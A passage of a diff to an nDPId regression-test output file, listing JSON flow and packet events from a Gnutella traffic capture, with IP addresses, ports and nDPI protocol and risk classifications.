{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":63001,"flow_last_seen":63445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":65062,"flow_last_seen":65418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1142,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":69227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1089,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3065,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":191700,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191700,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00HEAAIARI3sKAAIPfCy+kXAJJ7oAIMCGR05EED8oAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3066,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":191700,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191700,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0uoEAAIARu5gKAAIPXFhcOHAJUhEAIBhcR05EED8pAQFUC1FLUlAGUk5BXS\/iNQlw"} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3067,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":191700,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191700,"pkt":"UlQAEjUCCAAn5uVZCABFAAA06UYAAIARhsYKAAIPW7Ni6nAJGMoAIEuVR05EED8qAQFUC1FLUlAGUk5BXS\/iNQlw"} 
@@ -1320,24 +1305,29 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3084,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":191703,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191703,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lsMAAIARXJwKAAIPVvTkVnAJJ5MAIMANR05EED87AQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3085,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":191704,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VboAAIARb2MKAAIPpanD43AJGMoAIKCTR05EED88AQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3086,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":191704,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0dUAAAIARISYKAAIPsKPnoHAJGMoAIHHbR05EED89AQFUC1FLUlAGUk5BXS\/iNQlw"} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63000,"flow_last_seen":63524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":180000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":12876,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":180000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":180000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74329,"flow_last_seen":74396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1102,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":64032,"flow_last_seen":64562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":180000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":13092,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":70230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":756,"flow_tot_l4_payload_len":1058,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72264,"flow_last_seen":72720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":954,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":63001,"flow_last_seen":78562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74327,"flow_last_seen":74692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1108,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1105,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":70230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":756,"flow_tot_l4_payload_len":1058,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69141,"flow_last_seen":69581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1141,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":68108,"flow_last_seen":68639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1147,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63001,"flow_last_seen":63616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":64031,"flow_last_seen":64521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1140,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 